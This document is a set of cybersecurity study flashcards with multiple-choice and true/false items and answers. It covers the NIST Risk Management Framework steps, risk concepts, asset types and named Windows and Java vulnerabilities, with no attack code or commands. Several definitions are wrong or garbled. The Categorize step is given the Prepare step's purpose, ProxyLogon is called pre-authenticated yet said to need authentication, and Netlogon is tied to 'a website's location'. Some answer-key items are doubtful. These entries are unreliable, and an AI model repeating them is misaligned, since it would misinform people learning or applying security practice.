Risk Management and NIST RMF Flashcards
What is the 5th step of the NIST RMF
Assess:
to determine if established controls are implemented correctly
What is the 6th Step of the NIST RMF?
Authorize:
being accountable for the security and privacy risks that may exist in an organization
What is Business continuity?
An organization’s ability to maintain their everyday productivity by establishing risk disaster recovery plans
What is the 2nd Step of the NIST RMF?
Categorize:
used to develop risk management processes and tasks
What is an External threat?
Anything outside the organization that has the potential to harm organizational assets
What is the 4th step of the NIST RMF?
Implement:
to implement security and privacy plans for an organization
What is an Internal threat?
A current or former employee, external vendor, or trusted partner who poses a security risk
What is the 7th step of the NIST RMF?
Monitor: that means be aware of how systems are operating
What is the 1st step of the NIST RMF?
Prepare: related to activities that are necessary to manage security and privacy risks before a breach occurs
What is Ransomware?
A malicious attack where threat actors encrypt an organization’s data and demand payment to restore access
What is Risk?
Anything that can impact the confidentiality, integrity, or availability of an asset
What is Risk mitigation?
The process of having the right procedures and rules in place to quickly reduce the impact of a risk like a breach
What is Security posture?
An organization’s ability to manage its defence of critical assets and data and react to change
What is the 3rd step of NIST RMF?
Select: means to choose, customize, and capture documentation of the controls that protect an organization
What is meant by Shared responsibility?
The idea that all individuals within an organization take an active role in lowering risk and maintaining both physical and virtual security
What is Social engineering?
A manipulation technique that exploits human error to gain private information, access, or valuables
What is a Vulnerability?
A weakness that can be exploited by a threat
What are the 7 steps in the NIST RMF?
1.Prepare
2. Categorise
3. Select
4. Implement
5. Assess
6. Authorise
7. Monitor
What does NIST RMF mean?
National Institute of Standards and Technology- Risk Management Framework
Which of the following is the first step in the NIST Risk Management Framework (RMF)?
(a) Prepare
(b) Categorize
(c) Select
(d) Implement
a- Prepare
What is the purpose of the “select” step in the RMF?
(a) To develop risk management processes and tasks
(b) To choose, customize, and capture documentation of controls
(c) To implement security and privacy plans
(d) To determine if established controls are implemented correctly
(b) To choose, customize, and capture documentation of controls
Which of the following is NOT a task that an entry-level security analyst may perform as part of the RMF?
(a) Monitoring for risks
(b) Developing plans of action
(c) Generating reports
(d) Establishing project milestones
(b) Developing plans of action
The RMF is only used by security professionals with advanced experience. (True/False)
False
The “monitor” step in the RMF involves assessing and maintaining technical operations. (True/False)
True
Entry-level security analysts are not responsible for understanding how to mitigate and manage risks. (True/False)
False
Digital assets include the personal information of employees, clients, or vendors, such as:
Social Security Numbers (SSNs), or unique national identification numbers assigned to individuals
Dates of birth
Bank account numbers
Mailing addresses
Examples of physical assets include:
Payment kiosks
Servers
Desktop computers
Office spaces
List some common strategies used to manage risks include:
Acceptance: Accepting a risk to avoid disrupting business continuity
Avoidance: Creating a plan to avoid the risk altogether
Transference: Transferring risk to a third party to manage
Mitigation: Lessening the impact of a known risk
What are the different factors that can affect the likelihood of a risk to an organization’s assets?
External risk: Anything outside the organization that has the potential to harm organizational assets, such as threat actors attempting to gain access to private information
Internal risk: A current or former employee, vendor, or trusted partner who poses a security risk
Legacy systems: Old systems that might not be accounted for or updated, but can still impact assets, such as workstations or old mainframe systems. For example, an organization might have an old vending machine that takes credit card payments or a workstation that is still connected to the legacy accounting system.
Multiparty risk: Outsourcing work to third-party vendors can give them access to intellectual property, such as trade secrets, software designs, and inventions.
Software compliance/licensing: Software that is not updated or in compliance, or patches that are not installed in a timely manner
Which resource regularly updates and publishes a standard awareness document about the top 10 most critical security risks
to web applications?
Open Web Application Security Project (OWASP)
Which types of vulnerabilities within their systems should organizations regularly inspect for?
ProxyLogon: A pre-authenticated vulnerability that affects the Microsoft Exchange server. This means a threat actor can complete a user authentication process to deploy malicious code from a remote location.
ZeroLogon: A vulnerability in Microsoft’s Netlogon authentication protocol. An authentication protocol is a way to verify a person’s identity. Netlogon is a service that ensures a user’s identity before allowing access to a website’s location.
Log4Shell: Allows attackers to run Java code on someone else’s computer or leak sensitive information. It does this by enabling a remote attacker to take control of devices connected to the internet and run malicious code.
PetitPotam: Affects Windows New Technology Local Area Network (LAN) Manager (NTLM). It is a theft technique that allows a LAN-based attacker to initiate an authentication request.
Security logging and monitoring failures: Insufficient logging and monitoring capabilities that result in attackers exploiting vulnerabilities without the organization knowing it
Server-side request forgery: Allows attackers to manipulate a server-side application into accessing and updating backend resources. It can also allow threat actors to steal data.
What is ProxyLogon?
Vulnerability type:
A pre-authenticated vulnerability that affects the Microsoft Exchange server. This means a threat actor can complete a user authentication process to deploy malicious code from a remote location
What is a ZeroLogon?
A vulnerability in Microsoft’s Netlogon authentication protocol. An authentication protocol is a way to verify a person’s identity. Netlogon is a service that ensures a user’s identity before allowing access to a website’s location.
What is Log4Shell?
A vulnerability that allows attackers to run Java code on someone else’s computer or leak sensitive information. It does this by enabling a remote attacker to take control of devices connected to the internet and run malicious code.
What is PetitPotam?
A vulnerability that affects Windows New Technology Local Area Network (LAN) Manager (NTLM). It is a theft technique that allows a LAN-based attacker to initiate an authentication request.
Security logging and monitoring failures can result in …?
Insufficient logging and monitoring capabilities result in attackers exploiting vulnerabilities without the organization knowing it
What could result in Server-side request forgery vulnerability?
It can allow attackers to manipulate a server-side application into accessing and updating backend resources. It can also allow threat actors to steal data.
Which of the following is a common risk management strategy?
(a) Acceptance
(b) Avoidance
(c) Transference
(d) All of the above
(d) All of the above
Which of the following is a type of threat?
(a) Insider threat
(b) Advanced persistent threat (APT)
(c) Legacy system
(d) Software compliance/licensing
(a) Insider threat
Which of the following is a type of vulnerability?
(a) ProxyLogon
(b) ZeroLogon
(c) Log4Shell
(d) All of the above
(d) All of the above
Risk is the likelihood of a threat (True/False)
True
Vulnerabilities are weaknesses that can be exploited by threats (True/False)
True
Security logging and monitoring failures are not a type of vulnerability (True/False)
False
